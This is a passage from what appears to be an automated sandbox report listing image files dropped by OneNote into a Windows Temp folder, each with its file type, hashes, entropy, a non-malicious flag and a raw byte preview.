                                                                                                                                            SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                            SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{704E20B3-3F54-46A2-9FD6-6316DA65AACA}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{70C8F16A-1548-4565-984E-C592FD3F5370}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{72E1B468-94FF-4CCB-83FB-32FB1D9209CD}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{744EE097-4AC6-4B0E-B6B4-1A15FB527E8E}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2266
                                                                                                                                            Entropy (8bit):5.563021222358941
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                                                            MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                                                            SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                                                            SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                                                            SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{7624F627-6B60-4A26-AF5D-AE94DCA5FE79}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{7697D620-AE1E-4301-A5D0-981AD0449F4D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{78DAA307-7D8C-48B8-AEF4-DE9F92D446EC}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{7939DC4B-63AF-4D5A-B675-A849FC73895B}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):36740
                                                                                                                                            Entropy (8bit):7.48266872907324
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                                                            MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                                                            SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                                                            SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                                                            SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{7B96234C-22AB-4BFC-9D87-0C896F042F83}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):68633
                                                                                                                                            Entropy (8bit):7.709776384921022
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                            MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                            SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                            SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                            SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{7ECB3406-FDB4-4E32-84BD-8C7420B9BEC6}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{80935C19-ABFF-45A0-B8F5-E267B494D634}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{81049552-906A-469C-84D3-6B124DBA945D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25622
                                                                                                                                            Entropy (8bit):7.058784902089801
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                            MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                            SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                            SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                            SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{813A8D72-8211-4EA6-8541-61EC39BD99F0}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
